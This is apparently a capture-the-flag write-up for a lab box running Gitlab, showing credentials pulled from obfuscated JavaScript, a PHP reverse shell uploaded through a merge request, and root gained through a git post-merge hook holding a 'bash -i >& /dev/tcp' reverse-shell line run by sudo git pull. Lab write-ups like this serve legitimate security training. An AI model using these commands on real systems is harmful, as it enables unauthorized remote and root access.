Target IP:

Exploitation Summary

Initial Exploitation

  • Vulnerability: Security through obscurity
  • Explanation: Credentials are obscured in javascript function within the website.

Privilege Escalation

  • Vulnerability: sudo git pull
  • Explanation: hook script for post-merge can be defined to perform code execution as root


nmap -p- -A -T4

nmap scan
TCP 22: OpenSSH 7.6p1
TCP 80: nginx

Initial Shell Exploitation

Let’s check out the website


The home page is redirected to the sign in page. The bottom has 2 links of interest. Explore and Help.

explore page

Explore link bring us to the Projects page where we can see current projects, groups and snippets. Unfortunately, there’s no content here.

Help page

Help page only has a bookmarks.html link that brings us to the following screen:


All links except Gitlab Login point to external sites. When hovering over the Gitlab Login link, it’s showing some javascript code that has a function with a variable defined inside the function. To find out what the variable contains, we can use the development console

  • press F12
  • click Console tab
  • paste only the variable portion of the javascript
  • examine the variable _0x4b18
check javascript variable

looks like this is login credentials.The easiest way to use this credentials is to bookmark the link (right click on the link):


Now go back to the login page and select the bookmarked link:

populate credentials

The credentials is populated to the sign in form. How convenient. Of course, we can also simply type in the credentials ourselves. Now click on Sign In and we sign successful in to the application

signed in

This Gitlab allows us to maintain our projects. Essentially, we can upload any files to the project. So let’s prepare a php reverse shell using the following commands. This will use ip-address, port # 443 and name the file shell443.php.

cat /usr/share/webshells/php/php-reverse-shell.php | sed "s/" | sed "s/1234/443/g" > shell443.php 

It’s time to upload the file.

  • navigate to project Profile
  • click + icon
  • select Upload file
upload file
  • click to select file shell443.php
  • click Upload file
upload file confirm

The file should now be uploaded. Now make it available to the website.

  • scroll down and click Submit merge request
submit merge request
  • click Merge

The file is ready. Now use netcat to listen to port 443

nc -nvlp 443

And navigate to

initial shell obtained

Privilege Escalation

sudo -l

sudo -l is one of the first commands I use to determine if the user has any power to execute some commands as root. Sure enough, we are able to perform git pull.

It’s not immediately clear what we can do to escalate privilege. So do some researches on Google and I am able to find out a feature call git hook. A git hook basically is a trigger to execute some custom scripts when a certain event/action occurs. Couple good read can be found at:

For git pull, hook post-merge scripts can be used and will be triggered when a merge occurs.

To achieve that, we will create a local copy of the project Profile. Then make some changes and perform a merge. And finally doing a sudo git pull on the local copy will trigger the custom post-merge script defined in the local copy. Now, let’s put this into actions.

Make a local copy

cd /tmp
cp -r /var/www/html/profile .

Modify shell443.php and perform a merge again

  • click on shell443.php
  • click Edit
  • make some changes (any change will do)
  • click Commit changes
modify shell443
  • click Submit merge request
  • click Merge (just like when we first uploaded the file)

Prepare hook post-merge script

 cd /tmp/profile/.git/hooks
 echo '#!/bin/bash' > post-merge
 echo 'bash -i >& /dev/tcp/ 0>&1' >> post-merge
 chmod 755 post-merge 

This script, when executed, will connect back to kali machine on port 4000

Netcat listens to port 4000

nc -nvlp 4000

Perform git pull (final trigger)

cd /tmp/profile
sudo git pull
git pull
root shell

root shell obtained.


We got both user & root flags after rooting the box.

user flag
root flag

Thank you for the box, Frey & thek.

Leave a Reply

Close Menu